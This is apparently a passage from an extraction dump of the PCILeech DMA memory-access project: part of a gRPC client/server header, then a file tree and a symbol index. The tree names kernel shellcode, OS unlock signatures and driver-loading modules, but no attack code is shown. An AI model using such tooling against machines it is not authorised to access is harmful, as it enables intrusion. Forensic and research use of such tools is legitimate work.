_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCert,
_In_ LPCSTR szTlsClientCert,
_In_ LPCSTR szTlsClientCertPrivateKey
);
typedef LEECHGRPC_CLIENT_HANDLE(*pfn_leechgrpc_client_create_secure_pemraw)(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCert,
_In_ LPCSTR szTlsClientCert,
_In_ LPCSTR szTlsClientCertPrivateKey
);
/*
* Create a gRPC client connection to the gRPC server with mTLS.
* -- pszAddress: Address of the gRPC server.
* -- dwPort: Port of the gRPC server.
* -- szTlsServerHostnameOverride: Optional hostname to verify against the server certificate (if different from address).
* -- szTlsServerCertPath: Server CA certificate to trust for mTLS connections.
* -- szTlsClientCertPath: Cerver TLS certificate.
* -- szTlsClientCertPrivateKeyPath: Client TLS certificate private key.
*/
LEECHGRPC_EXPORTED_FUNCTION _Success_(return != NULL)
LEECHGRPC_CLIENT_HANDLE leechgrpc_client_create_secure_pemfile(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCertPath,
_In_ LPCSTR szTlsClientCertPath,
_In_ LPCSTR szTlsClientCertPrivateKeyPath
);
typedef LEECHGRPC_CLIENT_HANDLE(*pfn_leechgrpc_client_create_secure_pemfile)(
_In_ LPCSTR szAddress,
_In_ DWORD dwPort,
_In_opt_ LPCSTR szTlsServerHostnameOverride,
_In_opt_ LPCSTR szTlsServerCertPath,
_In_ LPCSTR szTlsClientCertPath,
_In_ LPCSTR szTlsClientCertPrivateKeyPath
);
//-----------------------------------------------------------------------------
// LeechgRPC Server API:
//-----------------------------------------------------------------------------
/*
* Callback function used to pass on a command received by the gRPC server.
* -- pbIn: Pointer to the input buffer.
* -- cbIn: Size of the input buffer.
* -- ppbOut: Pointer to receive the output buffer allocated by the callback function, freed by the caller.
* -- pcbOut: Pointer to receive the size of the output buffer.
*/
typedef VOID(*PFN_RESERVED_SUBMIT_COMMAND_CB)(_In_opt_ PVOID ctx, _In_ PBYTE pbIn, _In_ SIZE_T cbIn, _Out_ PBYTE *ppbOut, _Out_ SIZE_T *pcbOut);
/*
* Wait for the gRPC server to shutdown.
* -- hGRPC: Handle to the gRPC server.
*/
LEECHGRPC_EXPORTED_FUNCTION
VOID leechgrpc_server_wait(_In_ LEECHGRPC_SERVER_HANDLE hGRPC);
typedef VOID(*pfn_leechgrpc_server_wait)(_In_ LEECHGRPC_SERVER_HANDLE hGRPC);
/*
* Shut down the
gitextract_qpoecbmd/
├── .gitignore
├── LICENSE
├── files/
│ ├── Certs/
│ │ └── readme.txt
│ ├── agent-find-rwx.py
│ ├── fbsdx64_filepull.ksh
│ ├── lx64_exec_root.ksh
│ ├── lx64_filedelete.ksh
│ ├── lx64_filepull.ksh
│ ├── lx64_filepush.ksh
│ ├── macos_filepull.ksh
│ ├── macos_filepush.ksh
│ ├── macos_unlock.ksh
│ ├── pcileech.icns
│ ├── pcileech.txt
│ ├── pcileech_gensig.cfg
│ ├── signature_info.txt
│ ├── stickykeys_cmd_win.sig
│ ├── uefi_textout.ksh
│ ├── uefi_winload_ntos_patch.ksh
│ ├── unlock_macos.sig
│ ├── unlock_win10x64.sig
│ ├── unlock_win10x86.sig
│ ├── unlock_win11x64.sig
│ ├── unlock_win8x64.sig
│ ├── unlock_winvistax64.sig
│ ├── win7x64.kmd
│ ├── winvistax64.kmd
│ ├── wx64_driverinfo.ksh
│ ├── wx64_driverload_svc.ksh
│ ├── wx64_driverunload.ksh
│ ├── wx64_filepull.ksh
│ ├── wx64_filepush.ksh
│ ├── wx64_pageinfo.ksh
│ ├── wx64_pagesignature.ksh
│ ├── wx64_psblue.ksh
│ ├── wx64_pscmd.ksh
│ ├── wx64_pscmd_user.ksh
│ ├── wx64_pscreate.ksh
│ ├── wx64_pskill.ksh
│ ├── wx64_pslist.ksh
│ └── wx64_unlock.ksh
├── includes/
│ ├── dokan.h
│ ├── fileinfo.h
│ ├── leechcore.h
│ ├── leechgrpc.h
│ ├── lib32/
│ │ ├── leechcore.lib
│ │ └── vmm.lib
│ ├── lib64/
│ │ ├── leechcore.lib
│ │ └── vmm.lib
│ ├── libpdbcrust.h
│ ├── public.h
│ ├── vmmdll.h
│ └── vmmyara.h
├── pcileech/
│ ├── Makefile
│ ├── Makefile.macos
│ ├── charutil.c
│ ├── charutil.h
│ ├── device.c
│ ├── device.h
│ ├── executor.c
│ ├── executor.h
│ ├── extra.c
│ ├── extra.h
│ ├── help.c
│ ├── help.h
│ ├── kmd.c
│ ├── kmd.h
│ ├── memdump.c
│ ├── memdump.h
│ ├── mempatch.c
│ ├── mempatch.h
│ ├── ob/
│ │ ├── ob.h
│ │ ├── ob_cachemap.c
│ │ ├── ob_core.c
│ │ ├── ob_map.c
│ │ └── ob_set.c
│ ├── oscompatibility.c
│ ├── oscompatibility.h
│ ├── pcileech.c
│ ├── pcileech.h
│ ├── pcileech.rc
│ ├── pcileech.vcxproj
│ ├── pcileech.vcxproj.filters
│ ├── pcileech.vcxproj.user
│ ├── shellcode.h
│ ├── statistics.c
│ ├── statistics.h
│ ├── umd.c
│ ├── umd.h
│ ├── util.c
│ ├── util.h
│ ├── version.h
│ ├── vfs.c
│ ├── vfs.h
│ ├── vfslist.c
│ ├── vfslist.h
│ ├── vmmx.c
│ └── vmmx.h
├── pcileech.sln
├── pcileech_shellcode/
│ ├── fbsdx64_common.c
│ ├── fbsdx64_common.h
│ ├── fbsdx64_common_a.asm
│ ├── fbsdx64_filepull.c
│ ├── fbsdx64_stage2.asm
│ ├── fbsdx64_stage3.asm
│ ├── fbsdx64_stage3_c.c
│ ├── info_kmd_core.txt
│ ├── lx64_common.c
│ ├── lx64_common.h
│ ├── lx64_common_a.asm
│ ├── lx64_exec_root.c
│ ├── lx64_filedelete.c
│ ├── lx64_filepull.c
│ ├── lx64_filepush.c
│ ├── lx64_stage2.asm
│ ├── lx64_stage2_efi.asm
│ ├── lx64_stage3.asm
│ ├── lx64_stage3_c.c
│ ├── lx64_stage3_pre.asm
│ ├── lx64_vfs.c
│ ├── macos_common.c
│ ├── macos_common.h
│ ├── macos_common_a.asm
│ ├── macos_filedelete.c
│ ├── macos_filepull.c
│ ├── macos_filepush.c
│ ├── macos_stage2.asm
│ ├── macos_stage3.asm
│ ├── macos_stage3_c.c
│ ├── macos_unlock.c
│ ├── macos_vfs.c
│ ├── pcileech_shellcode.vcxproj
│ ├── pcileech_shellcode.vcxproj.filters
│ ├── pcileech_shellcode.vcxproj.user
│ ├── statuscodes.h
│ ├── uefi_common.c
│ ├── uefi_common.h
│ ├── uefi_common_a.asm
│ ├── uefi_kmd.asm
│ ├── uefi_kmd_c.c
│ ├── uefi_textout.c
│ ├── uefi_winload_ntos_kmd.asm
│ ├── uefi_winload_ntos_kmd_c.c
│ ├── uefi_winload_ntos_patch.c
│ ├── wx64_common.c
│ ├── wx64_common.h
│ ├── wx64_common_a.asm
│ ├── wx64_driverinfo.c
│ ├── wx64_driverload_svc.c
│ ├── wx64_driverunload.c
│ ├── wx64_exec_user.asm
│ ├── wx64_exec_user_c.c
│ ├── wx64_filepull.c
│ ├── wx64_filepush.c
│ ├── wx64_pageinfo.asm
│ ├── wx64_pagesignature.c
│ ├── wx64_psblue.asm
│ ├── wx64_pscreate.c
│ ├── wx64_pskill.c
│ ├── wx64_pslist.c
│ ├── wx64_stage1.asm
│ ├── wx64_stage2.asm
│ ├── wx64_stage23_vmm.asm
│ ├── wx64_stage23_vmm3.asm
│ ├── wx64_stage2_hal.asm
│ ├── wx64_stage3.asm
│ ├── wx64_stage3_c.c
│ ├── wx64_stage3_pre.asm
│ ├── wx64_umd_exec.asm
│ ├── wx64_umd_exec_c.c
│ ├── wx64_unlock.c
│ └── wx64_vfs.c
├── readme.md
├── usb3380.md
└── usb3380_flash/
├── linux/
│ ├── Makefile
│ ├── pcileech_flash.c
│ ├── readme.md
│ └── readme_flash.txt
└── windows/
├── USB3380Flash/
│ ├── USB3380Flash.c
│ ├── USB3380Flash.h
│ ├── USB3380Flash.inf
│ ├── USB3380Flash.user
│ ├── USB3380Flash.vcxproj
│ ├── USB3380Flash.vcxproj.filters
│ └── USB3380Flash.vcxproj.user
└── USB3380Flash_Installer/
├── USB3380Flash_Installer.vcxproj
├── USB3380Flash_Installer.vcxproj.filters
├── USB3380Flash_Installer.vcxproj.user
└── installer.c
SYMBOL INDEX (1105 symbols across 78 files)
FILE: includes/dokan.h
type VOID (line 126) | typedef VOID *DOKAN_HANDLE, **PDOKAN_HANDLE;
type DOKAN_OPTIONS (line 133) | typedef struct _DOKAN_OPTIONS {
type DOKAN_FILE_INFO (line 170) | typedef struct _DOKAN_FILE_INFO {
type DOKAN_OPERATIONS (line 240) | typedef struct _DOKAN_OPERATIONS {
FILE: includes/fileinfo.h
type FILE_INFORMATION_CLASS (line 61) | typedef enum _FILE_INFORMATION_CLASS {
type FS_INFORMATION_CLASS (line 150) | typedef enum _FSINFOCLASS {
type FILE_ALIGNMENT_INFORMATION (line 171) | typedef struct _FILE_ALIGNMENT_INFORMATION {
type FILE_NAME_INFORMATION (line 186) | typedef struct _FILE_NAME_INFORMATION {
type FILE_ATTRIBUTE_TAG_INFORMATION (line 203) | typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {
type FILE_DISPOSITION_INFORMATION (line 222) | typedef struct _FILE_DISPOSITION_INFORMATION {
type FILE_DISPOSITION_INFORMATION_EX (line 243) | typedef struct _FILE_DISPOSITION_INFORMATION_EX {
type FILE_END_OF_FILE_INFORMATION (line 262) | typedef struct _FILE_END_OF_FILE_INFORMATION {
type FILE_VALID_DATA_LENGTH_INFORMATION (line 275) | typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {
type FILE_BASIC_INFORMATION (line 289) | typedef struct _FILE_BASIC_INFORMATION {
type FILE_STANDARD_INFORMATION (line 319) | typedef struct _FILE_STANDARD_INFORMATION {
type FILE_POSITION_INFORMATION (line 348) | typedef struct _FILE_POSITION_INFORMATION {
type FILE_DIRECTORY_INFORMATION (line 359) | typedef struct _FILE_DIRECTORY_INFORMATION {
type FILE_FULL_DIR_INFORMATION (line 425) | typedef struct _FILE_FULL_DIR_INFORMATION {
type FILE_ID_FULL_DIR_INFORMATION (line 495) | typedef struct _FILE_ID_FULL_DIR_INFORMATION {
type FILE_BOTH_DIR_INFORMATION (line 570) | typedef struct _FILE_BOTH_DIR_INFORMATION {
type FILE_ID_BOTH_DIR_INFORMATION (line 647) | typedef struct _FILE_ID_BOTH_DIR_INFORMATION {
type FILE_ID_EXTD_BOTH_DIR_INFORMATION (line 729) | typedef struct _FILE_ID_EXTD_BOTH_DIR_INFORMATION {
type FILE_NAMES_INFORMATION (line 814) | typedef struct _FILE_NAMES_INFORMATION {
type FILE_INTERNAL_INFORMATION (line 849) | typedef struct _FILE_INTERNAL_INFORMATION {
type FILE_ID_INFORMATION (line 865) | typedef struct _FILE_ID_INFORMATION {
type FILE_EA_INFORMATION (line 883) | typedef struct _FILE_EA_INFORMATION {
type FILE_ACCESS_INFORMATION (line 896) | typedef struct _FILE_ACCESS_INFORMATION {
type FILE_MODE_INFORMATION (line 910) | typedef struct _FILE_MODE_INFORMATION {
type FILE_ALL_INFORMATION (line 931) | typedef struct _FILE_ALL_INFORMATION {
type FILE_ALLOCATION_INFORMATION (line 958) | typedef struct _FILE_ALLOCATION_INFORMATION {
type FILE_LINK_INFORMATION (line 972) | typedef struct _FILE_LINK_INFORMATION {
type FILE_RENAME_INFORMATION (line 1004) | typedef struct _FILE_RENAME_INFORMATION {
type FILE_STREAM_INFORMATION (line 1035) | typedef struct _FILE_STREAM_INFORMATION {
type FILE_FS_LABEL_INFORMATION (line 1066) | typedef struct _FILE_FS_LABEL_INFORMATION {
type FILE_FS_VOLUME_INFORMATION (line 1083) | typedef struct _FILE_FS_VOLUME_INFORMATION {
type FILE_FS_SIZE_INFORMATION (line 1112) | typedef struct _FILE_FS_SIZE_INFORMATION {
type FILE_FS_FULL_SIZE_INFORMATION (line 1139) | typedef struct _FILE_FS_FULL_SIZE_INFORMATION {
type FILE_FS_ATTRIBUTE_INFORMATION (line 1170) | typedef struct _FILE_FS_ATTRIBUTE_INFORMATION {
type FILE_NETWORK_OPEN_INFORMATION (line 1197) | typedef struct _FILE_NETWORK_OPEN_INFORMATION {
type FILE_NETWORK_PHYSICAL_NAME_INFORMATION (line 1239) | typedef struct _FILE_NETWORK_PHYSICAL_NAME_INFORMATION {
type UNICODE_STRING (line 1343) | typedef struct _UNICODE_STRING {
FILE: includes/leechcore.h
type QWORD (line 34) | typedef unsigned __int64 QWORD, *PQWORD;
type VOID (line 42) | typedef void VOID, *PVOID, *HANDLE, **PHA...
type QWORD (line 43) | typedef long long unsigned int QWORD, *PQWORD, ULONG64, *PU...
type SIZE_T (line 44) | typedef size_t SIZE_T, *PSIZE_T;
type FILETIME (line 45) | typedef uint64_t FILETIME, *PFILETIME;
type DWORD (line 46) | typedef uint32_t DWORD, *PDWORD, *LPDWORD, BO...
type WORD (line 47) | typedef uint16_t WORD, *PWORD;
type BYTE (line 48) | typedef uint8_t BYTE, *PBYTE, *LPBYTE, UCHAR;
type CHAR (line 49) | typedef char CHAR, *PCHAR, *LPSTR;
type WCHAR (line 51) | typedef uint16_t WCHAR, *PWCHAR, *LPWSTR;
type LC_CONFIG (line 101) | typedef struct LC_CONFIG {
type LC_CONFIG_ERRORINFO (line 118) | typedef struct tdLC_CONFIG_ERRORINFO {
function EXPORTED_FUNCTION (line 137) | EXPORTED_FUNCTION _Success_(return != NULL)
type LC_STATISTICS (line 514) | typedef struct tdLC_STATISTICS {
type LC_MEMMAP_ENTRY (line 524) | typedef struct tdLC_MEMMAP_ENTRY {
type LC_ARCH_TP (line 530) | typedef enum tdLC_ARCH_TP {
type LC_TLP (line 547) | typedef struct tdLC_TLP {
type VOID (line 558) | typedef VOID(*PLC_TLP_FUNCTION_CALLBACK)(
type LC_VMM (line 580) | typedef struct tdLC_VMM {
type LC_BAR (line 595) | typedef struct tdLC_BAR {
type LC_BAR_REQUEST (line 606) | typedef struct tdLC_BAR_REQUEST {
type VOID (line 629) | typedef VOID(*PLC_BAR_FUNCTION_CALLBACK)(_Inout_ PLC_BAR_REQUEST pBarReq...
FILE: includes/leechgrpc.h
type VOID (line 39) | typedef void VOID, *PVOID, *HANDLE;
type SIZE_T (line 40) | typedef size_t SIZE_T;
type DWORD (line 41) | typedef uint32_t DWORD, BOOL;
type BYTE (line 42) | typedef uint8_t BYTE, *PBYTE;
type CHAR (line 43) | typedef char CHAR, *LPSTR;
FILE: includes/public.h
type DOKAN_UNICODE_STRING_INTERMEDIATE (line 128) | typedef struct _DOKAN_UNICODE_STRING_INTERMEDIATE {
type DOKAN_NOTIFY_PATH_INTERMEDIATE (line 141) | typedef struct _DOKAN_NOTIFY_PATH_INTERMEDIATE {
type DOKAN_ACCESS_STATE_INTERMEDIATE (line 153) | typedef struct _DOKAN_ACCESS_STATE_INTERMEDIATE {
type DOKAN_ACCESS_STATE (line 176) | typedef struct _DOKAN_ACCESS_STATE {
type DOKAN_IO_SECURITY_CONTEXT_INTERMEDIATE (line 195) | typedef struct _DOKAN_IO_SECURITY_CONTEXT_INTERMEDIATE {
type DOKAN_IO_SECURITY_CONTEXT (line 201) | typedef struct _DOKAN_IO_SECURITY_CONTEXT {
type CREATE_CONTEXT (line 206) | typedef struct _CREATE_CONTEXT {
type CLEANUP_CONTEXT (line 217) | typedef struct _CLEANUP_CONTEXT {
type CLOSE_CONTEXT (line 223) | typedef struct _CLOSE_CONTEXT {
type DIRECTORY_CONTEXT (line 229) | typedef struct _DIRECTORY_CONTEXT {
type READ_CONTEXT (line 241) | typedef struct _READ_CONTEXT {
type WRITE_CONTEXT (line 248) | typedef struct _WRITE_CONTEXT {
type FILEINFO_CONTEXT (line 258) | typedef struct _FILEINFO_CONTEXT {
type SETFILE_CONTEXT (line 265) | typedef struct _SETFILE_CONTEXT {
type VOLUME_CONTEXT (line 273) | typedef struct _VOLUME_CONTEXT {
type LOCK_CONTEXT (line 278) | typedef struct _LOCK_CONTEXT {
type FLUSH_CONTEXT (line 286) | typedef struct _FLUSH_CONTEXT {
type UNMOUNT_CONTEXT (line 291) | typedef struct _UNMOUNT_CONTEXT {
type SECURITY_CONTEXT (line 296) | typedef struct _SECURITY_CONTEXT {
type SET_SECURITY_CONTEXT (line 303) | typedef struct _SET_SECURITY_CONTEXT {
type EVENT_CONTEXT (line 311) | typedef struct _EVENT_CONTEXT {
type VOLUME_METRICS (line 340) | typedef struct _VOLUME_METRICS {
type EVENT_INFORMATION (line 360) | typedef struct _EVENT_INFORMATION {
type EVENT_DRIVER_INFO (line 454) | typedef struct _EVENT_DRIVER_INFO {
type EVENT_START (line 464) | typedef struct _EVENT_START {
type DOKAN_RENAME_INFORMATION (line 480) | typedef struct _DOKAN_RENAME_INFORMATION {
type DOKAN_LINK_INFORMATION (line 496) | typedef struct _DOKAN_LINK_INFORMATION {
type DOKAN_MOUNT_POINT_INFO (line 506) | typedef struct _DOKAN_MOUNT_POINT_INFO {
type DOKAN_LOG_MESSAGE (line 526) | typedef struct _DOKAN_LOG_MESSAGE {
FILE: includes/vmmdll.h
type QWORD (line 30) | typedef unsigned __int64 QWORD, *PQWORD;
type VOID (line 40) | typedef void VOID, *PVOID, *HANDLE, **PHA...
type QWORD (line 41) | typedef long long unsigned int QWORD, *PQWORD, ULONG64, *PU...
type SIZE_T (line 42) | typedef size_t SIZE_T, *PSIZE_T;
type FILETIME (line 43) | typedef uint64_t FILETIME, *PFILETIME;
type DWORD (line 44) | typedef uint32_t DWORD, *PDWORD, *LPDWORD, BO...
type WORD (line 45) | typedef uint16_t WORD, *PWORD;
type BYTE (line 46) | typedef uint8_t BYTE, *PBYTE, *LPBYTE, UCHAR;
type CHAR (line 47) | typedef char CHAR, *PCHAR, *LPSTR;
type WCHAR (line 49) | typedef uint16_t WCHAR, *PWCHAR, *LPWSTR;
type tdVMM_HANDLE (line 77) | struct tdVMM_HANDLE
type tdVMMVM_HANDLE (line 78) | struct tdVMMVM_HANDLE
type BYTE (line 79) | typedef BYTE OPAQUE_OB_HEADER[0x40];
function EXPORTED_FUNCTION (line 146) | EXPORTED_FUNCTION _Success_(return != NULL)
type SERVICE_STATUS (line 338) | typedef struct _SERVICE_STATUS {
type VMMDLL_VFS_FILELIST_EXINFO (line 369) | typedef struct tdVMMDLL_VFS_FILELIST_EXINFO {
type VMMDLL_VFS_FILELIST2 (line 386) | typedef struct tdVMMDLL_VFS_FILELIST2 {
type VMMDLL_VFS_FILELISTBLOB_ENTRY (line 393) | typedef struct tdVMMDLL_VFS_FILELISTBLOB_ENTRY {
type VMMDLL_VFS_FILELISTBLOB (line 399) | typedef struct tdVMMDLL_VFS_FILELISTBLOB {
function EXPORTED_FUNCTION (line 433) | EXPORTED_FUNCTION
type VMMDLL_FORENSIC_JSONDATA (line 551) | typedef struct tdVMMDLL_FORENSIC_JSONDATA {
type VMMDLL_FORENSIC_INGEST_OBJECT_TYPE (line 570) | typedef enum tdVMMDLL_FORENSIC_INGEST_OBJECT_TYPE {
type VMMDLL_FORENSIC_INGEST_OBJECT (line 574) | typedef struct tdVMMDLL_FORENSIC_INGEST_OBJECT {
type VMMDLL_FORENSIC_INGEST_PHYSMEM (line 585) | typedef struct tdVMMDLL_FORENSIC_INGEST_PHYSMEM {
type VMMDLL_FORENSIC_INGEST_VIRTMEM (line 595) | typedef struct tdVMMDLL_FORENSIC_INGEST_VIRTMEM {
type VMMDLL_PLUGIN_REGINFO (line 608) | typedef struct tdVMMDLL_PLUGIN_REGINFO {
function EXPORTED_FUNCTION (line 704) | EXPORTED_FUNCTION _Success_(return != 0)
type VMMDLL_MAP_VADENTRY (line 1176) | typedef struct tdVMMDLL_MAP_VADENTRY {
type VMMDLL_MAP_VADEXENTRY (line 1214) | typedef struct tdVMMDLL_MAP_VADEXENTRY {
type VMMDLL_MODULE_TP (line 1231) | typedef enum tdVMMDLL_MODULE_TP {
type VMMDLL_MAP_MODULEENTRY_DEBUGINFO (line 1238) | typedef struct tdVMMDLL_MAP_MODULEENTRY_DEBUGINFO {
type VMMDLL_MAP_MODULEENTRY_VERSIONINFO (line 1246) | typedef struct tdVMMDLL_MAP_MODULEENTRY_VERSIONINFO {
type VMMDLL_MAP_MODULEENTRY (line 1257) | typedef struct tdVMMDLL_MAP_MODULEENTRY {
type VMMDLL_MAP_UNLOADEDMODULEENTRY (line 1277) | typedef struct tdVMMDLL_MAP_UNLOADEDMODULEENTRY {
type VMMDLL_MAP_EATENTRY (line 1289) | typedef struct tdVMMDLL_MAP_EATENTRY {
type VMMDLL_MAP_IATENTRY (line 1299) | typedef struct tdVMMDLL_MAP_IATENTRY {
type VMMDLL_HEAP_TP (line 1316) | typedef enum tdVMMDLL_HEAP_TP {
type VMMDLL_HEAP_SEGMENT_TP (line 1322) | typedef enum tdVMMDLL_HEAP_SEGMENT_TP {
type VMMDLL_MAP_HEAP_SEGMENTENTRY (line 1334) | typedef struct tdVMMDLL_MAP_HEAP_SEGMENTENTRY {
type VMMDLL_MAP_HEAPENTRY (line 1341) | typedef struct tdVMMDLL_MAP_HEAPENTRY {
type VMMDLL_HEAPALLOC_TP (line 1349) | typedef enum tdVMMDLL_HEAPALLOC_TP {
type VMMDLL_MAP_HEAPALLOCENTRY (line 1361) | typedef struct tdVMMDLL_MAP_HEAPALLOCENTRY {
type VMMDLL_MAP_THREADENTRY (line 1367) | typedef struct tdVMMDLL_MAP_THREADENTRY {
type VMMDLL_MAP_THREAD_CALLSTACKENTRY (line 1398) | typedef struct tdVMMDLL_MAP_THREAD_CALLSTACKENTRY {
type VMMDLL_MAP_HANDLEENTRY (line 1410) | typedef struct tdVMMDLL_MAP_HANDLEENTRY {
type VMMDLL_MAP_POOL_TYPE (line 1427) | typedef enum tdVMMDLL_MAP_POOL_TYPE {
type VMM_MAP_POOL_TYPE_SUBSEGMENT (line 1434) | typedef enum tdVMM_MAP_POOL_TYPE_SUBSEGMENT {
type VMMDLL_MAP_POOLENTRYTAG (line 1443) | typedef struct tdVMMDLL_MAP_POOLENTRYTAG {
type VMMDLL_MAP_POOLENTRY (line 1455) | typedef struct tdVMMDLL_MAP_POOLENTRY {
type VMMDLL_MAP_KDEVICEENTRY (line 1471) | typedef struct tdVMMDLL_MAP_KDEVICEENTRY {
type VMMDLL_MAP_KDRIVERENTRY (line 1482) | typedef struct tdVMMDLL_MAP_KDRIVERENTRY {
type VMMDLL_MAP_KOBJECTENTRY (line 1493) | typedef struct tdVMMDLL_MAP_KOBJECTENTRY {
type VMMDLL_MAP_NETENTRY (line 1503) | typedef struct tdVMMDLL_MAP_NETENTRY {
type VMMDLL_MAP_PHYSMEMENTRY (line 1530) | typedef struct tdVMMDLL_MAP_PHYSMEMENTRY {
type VMMDLL_MAP_USERENTRY (line 1535) | typedef struct tdVMMDLL_MAP_USERENTRY {
type VMMDLL_VM_TP (line 1543) | typedef enum tdVMMDLL_VM_TP {
type VMMDLL_MAP_VMENTRY (line 1549) | typedef struct tdVMMDLL_MAP_VMENTRY {
type VMMDLL_MAP_SERVICEENTRY (line 1564) | typedef struct tdVMMDLL_MAP_SERVICEENTRY {
type VMMDLL_MAP_PTE (line 1580) | typedef struct tdVMMDLL_MAP_PTE {
type VMMDLL_MAP_VAD (line 1589) | typedef struct tdVMMDLL_MAP_VAD {
type VMMDLL_MAP_VADEX (line 1599) | typedef struct tdVMMDLL_MAP_VADEX {
type VMMDLL_MAP_MODULE (line 1606) | typedef struct tdVMMDLL_MAP_MODULE {
type VMMDLL_MAP_UNLOADEDMODULE (line 1615) | typedef struct tdVMMDLL_MAP_UNLOADEDMODULE {
type VMMDLL_MAP_EAT (line 1624) | typedef struct tdVMMDLL_MAP_EAT {
type VMMDLL_MAP_IAT (line 1640) | typedef struct tdVMMDLL_MAP_IAT {
type VMMDLL_MAP_HEAP (line 1650) | typedef struct tdVMMDLL_MAP_HEAP {
type VMMDLL_MAP_HEAPALLOC (line 1659) | typedef struct tdVMMDLL_MAP_HEAPALLOC {
type VMMDLL_MAP_THREAD (line 1667) | typedef struct tdVMMDLL_MAP_THREAD {
type VMMDLL_MAP_THREAD_CALLSTACK (line 1674) | typedef struct tdVMMDLL_MAP_THREAD_CALLSTACK {
type VMMDLL_MAP_HANDLE (line 1687) | typedef struct tdVMMDLL_MAP_HANDLE {
type VMMDLL_MAP_POOL (line 1696) | typedef struct tdVMMDLL_MAP_POOL {
type VMMDLL_MAP_KOBJECT (line 1707) | typedef struct tdVMMDLL_MAP_KOBJECT {
type VMMDLL_MAP_KDRIVER (line 1716) | typedef struct tdVMMDLL_MAP_KDRIVER {
type VMMDLL_MAP_KDEVICE (line 1725) | typedef struct tdVMMDLL_MAP_KDEVICE {
type VMMDLL_MAP_NET (line 1734) | typedef struct tdVMMDLL_MAP_NET {
type VMMDLL_MAP_PHYSMEM (line 1743) | typedef struct tdVMMDLL_MAP_PHYSMEM {
type VMMDLL_MAP_USER (line 1751) | typedef struct tdVMMDLL_MAP_USER {
type VMMDLL_MAP_VM (line 1760) | typedef struct tdVMMDLL_MAP_VM {
type VMMDLL_MAP_SERVICE (line 1769) | typedef struct tdVMMDLL_MAP_SERVICE {
function EXPORTED_FUNCTION (line 1788) | EXPORTED_FUNCTION
function EXPORTED_FUNCTION (line 2120) | EXPORTED_FUNCTION _Success_(return)
type VMMDLL_YARA_MEMORY_CALLBACK_CONTEXT (line 2247) | typedef struct tdVMMDLL_YARA_MEMORY_CALLBACK_CONTEXT {
function EXPORTED_FUNCTION (line 2268) | EXPORTED_FUNCTION _Success_(return)
type VMMDLL_MAP_PFN (line 2356) | typedef struct tdVMMDLL_MAP_PFN {
function EXPORTED_FUNCTION (line 2373) | EXPORTED_FUNCTION _Success_(return)
function EXPORTED_FUNCTION (line 2481) | EXPORTED_FUNCTION _Success_(return)
FILE: includes/vmmyara.h
type BOOL (line 41) | typedef uint32_t BOOL;
type VOID (line 42) | typedef void VOID, *PVOID, *HANDLE;
type SIZE_T (line 43) | typedef size_t SIZE_T;
type DWORD (line 44) | typedef uint32_t DWORD, *PDWORD;
type BYTE (line 45) | typedef uint8_t BYTE, *PBYTE;
type CHAR (line 46) | typedef char CHAR, *LPSTR;
type VMMYARA_ERROR (line 54) | typedef int VMMYARA_ERROR;
type HANDLE (line 55) | struct HANDLE
type VMMYARA_RULE_MATCH (line 216) | typedef struct tdVMMYARA_RULE_MATCH {
type BOOL (line 248) | typedef BOOL(*VMMYARA_SCAN_MEMORY_CALLBACK)(
FILE: pcileech/charutil.c
function BOOL (line 18) | BOOL CharUtil_IsAnsiA(_In_ LPCSTR sz)
function BOOL (line 29) | BOOL CharUtil_IsAnsiW(_In_ LPCWSTR wsz)
function BOOL (line 40) | BOOL CharUtil_IsAnsiFsA(_In_ LPCSTR sz)
function CharUtil_AtoU (line 68) | _Success_(return)
function CharUtil_UtoU (line 130) | _Success_(return)
function CharUtil_WtoU (line 190) | _Success_(return)
function CharUtil_UtoW (line 317) | _Success_(return)
function CharUtil_WtoW (line 407) | _Success_(return)
function VOID (line 422) | VOID CharUtil_EscapeJSON2(_In_ CHAR ch, _Out_writes_(2) PCHAR chj)
function VOID (line 436) | VOID CharUtil_EscapeJSON6(_In_ CHAR ch, _Out_writes_(6) PCHAR chj)
function CharUtil_UtoJ (line 464) | _Success_(return)
function CharUtil_AtoJ (line 533) | _Success_(return)
function CharUtil_WtoJ (line 612) | _Success_(return)
function CharUtil_UtoCSV (line 744) | _Success_(return)
function DWORD (line 844) | DWORD CharUtil_FixFsNameU(_Out_writes_(cbuDst) LPSTR uszDst, _In_ DWORD ...
function DWORD (line 907) | DWORD CharUtil_FixFsName(_Out_writes_(cbuDst) LPSTR uszOut, _In_ DWORD c...
function DWORD (line 969) | DWORD CharUtil_ReplaceMultiple(_Out_writes_(cbuDst) LPSTR uszOut, _In_ D...
function QWORD (line 999) | QWORD CharUtil_Hash64U(_In_opt_ LPCSTR usz, _In_ BOOL fUpper)
function QWORD (line 1022) | QWORD CharUtil_Hash64A(_In_opt_ LPCSTR sz, _In_ BOOL fUpper)
function QWORD (line 1038) | QWORD CharUtil_Hash64W(_In_opt_ LPCWSTR wsz, _In_ BOOL fUpper)
function DWORD (line 1063) | DWORD CharUtil_Hash32U(_In_opt_ LPCSTR usz, _In_ BOOL fUpper)
function DWORD (line 1086) | DWORD CharUtil_Hash32A(_In_opt_ LPCSTR sz, _In_ BOOL fUpper)
function DWORD (line 1102) | DWORD CharUtil_Hash32W(_In_opt_ LPCWSTR wsz, _In_ BOOL fUpper)
function DWORD (line 1133) | DWORD CharUtil_Internal_HashFs(_In_ LPSTR usz)
function DWORD (line 1150) | DWORD CharUtil_HashNameFsU(_In_ LPCSTR usz, _In_opt_ DWORD iSuffix)
function DWORD (line 1157) | DWORD CharUtil_HashNameFsA(_In_ LPCSTR sz, _In_opt_ DWORD iSuffix)
function DWORD (line 1164) | DWORD CharUtil_HashNameFsW(_In_ LPCWSTR wsz, _In_opt_ DWORD iSuffix)
function VOID (line 1179) | VOID CharUtil_ReplaceAllA(_Inout_ LPSTR sz, _In_ CHAR chOld, _In_ CHAR c...
function LPSTR (line 1200) | LPSTR CharUtil_PathSplitLastEx(_In_ LPCSTR usz, _Out_writes_(cbuPath) LP...
function LPSTR (line 1226) | LPSTR CharUtil_PathSplitLastInPlace(_Inout_ LPSTR usz)
